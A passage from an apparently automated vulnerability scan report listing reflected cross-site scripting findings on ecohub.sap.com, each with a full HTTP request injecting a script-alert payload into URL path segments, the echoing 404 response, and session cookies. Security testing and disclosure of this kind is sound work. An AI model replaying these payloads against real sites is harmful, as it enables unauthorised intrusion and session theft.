Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 85
Cache-Control: public, max-age=86370
Expires: Sun, 16 Oct 2011 14:25:16 GMT
Date: Sat, 15 Oct 2011 14:25:46 GMT
Connection: close

File not found: /img/banners7c1bb<script>alert(1)</script>a2aabb6bf4e/Madrid.288.png
3.7. http://ecohub.sap.com/img/banners/Madrid.288.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/Madrid.288.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 60bc8<script>alert(1)</script>bf2497c4639 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/banners/Madrid.288.png60bc8<script>alert(1)</script>bf2497c4639?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 85
Date: Sat, 15 Oct 2011 14:25:46 GMT
Connection: close

File not found: /img/banners/Madrid.288.png60bc8<script>alert(1)</script>bf2497c4639
3.8. http://ecohub.sap.com/img/banners/womanmanmonitor_vertical.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/womanmanmonitor_vertical.jpg

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ebf5<script>alert(1)</script>6d25fbe996 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img8ebf5<script>alert(1)</script>6d25fbe996/banners/womanmanmonitor_vertical.jpg?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 98
Cache-Control: public, max-age=86361
Expires: Sun, 16 Oct 2011 14:25:01 GMT
Date: Sat, 15 Oct 2011 14:25:40 GMT
Connection: close

File not found: /img8ebf5<script>alert(1)</script>6d25fbe996/banners/womanmanmonitor_vertical.jpg
3.9. http://ecohub.sap.com/img/banners/womanmanmonitor_vertical.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/womanmanmonitor_vertical.jpg

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 142c9<script>alert(1)</script>9524fe82742 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/banners142c9<script>alert(1)</script>9524fe82742/womanmanmonitor_vertical.jpg?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 99
Cache-Control: public, max-age=86355
Expires: Sun, 16 Oct 2011 14:24:59 GMT
Date: Sat, 15 Oct 2011 14:25:44 GMT
Connection: close

File not found: /img/banners142c9<script>alert(1)</script>9524fe82742/womanmanmonitor_vertical.jpg
3.10. http://ecohub.sap.com/img/banners/womanmanmonitor_vertical.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/womanmanmonitor_vertical.jpg

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c97fa<script>alert(1)</script>efe729d14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/banners/womanmanmonitor_vertical.jpgc97fa<script>alert(1)</script>efe729d14?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 97
Date: Sat, 15 Oct 2011 14:25:44 GMT
Connection: close

File not found: /img/banners/womanmanmonitor_vertical.jpgc97fa<script>alert(1)</script>efe729d14
3.11. http://ecohub.sap.com/img/banners/world-tour.288.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/world-tour.288.jpg

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4d7ad<script>alert(1)</script>af916879b70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img4d7ad<script>alert(1)</script>af916879b70/banners/world-tour.288.jpg?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 89
Cache-Control: public, max-age=86387
Expires: Sun, 16 Oct 2011 14:25:30 GMT
Date: Sat, 15 Oct 2011 14:25:43 GMT
Connection: close

File not found: /img4d7ad<script>alert(1)</script>af916879b70/banners/world-tour.288.jpg
3.12. http://ecohub.sap.com/img/banners/world-tour.288.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/world-tour.288.jpg

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a5f4a<script>alert(1)</script>145318725a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/bannersa5f4a<script>alert(1)</script>145318725a4/world-tour.288.jpg?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 89
Cache-Control: public, max-age=86400
Expires: Sun, 16 Oct 2011 14:25:44 GMT
Date: Sat, 15 Oct 2011 14:25:44 GMT
Connection: close

File not found: /img/bannersa5f4a<script>alert(1)</script>145318725a4/world-tour.288.jpg
3.13. http://ecohub.sap.com/img/banners/world-tour.288.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/world-tour.288.jpg

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 95f6f<script>alert(1)</script>da42c3dd6dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/banners/world-tour.288.jpg95f6f<script>alert(1)</script>da42c3dd6dc?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 89
Date: Sat, 15 Oct 2011 14:25:45 GMT
Connection: close

File not found: /img/banners/world-tour.288.jpg95f6f<script>alert(1)</script>da42c3dd6dc
3.14. http://ecohub.sap.com/img/empty.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/empty.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 664f2<script>alert(1)</script>a81d0f7539a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img664f2<script>alert(1)</script>a81d0f7539a/empty.gif?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 72
Cache-Control: public, max-age=86400
Expires: Sun, 16 Oct 2011 14:25:25 GMT
Date: Sat, 15 Oct 2011 14:25:25 GMT
Connection: close

File not found: /img664f2<script>alert(1)</script>a81d0f7539a/empty.gif
3.15. http://ecohub.sap.com/img/empty.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/empty.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f16e8<script>alert(1)</script>8de76daedec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/empty.giff16e8<script>alert(1)</script>8de76daedec?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
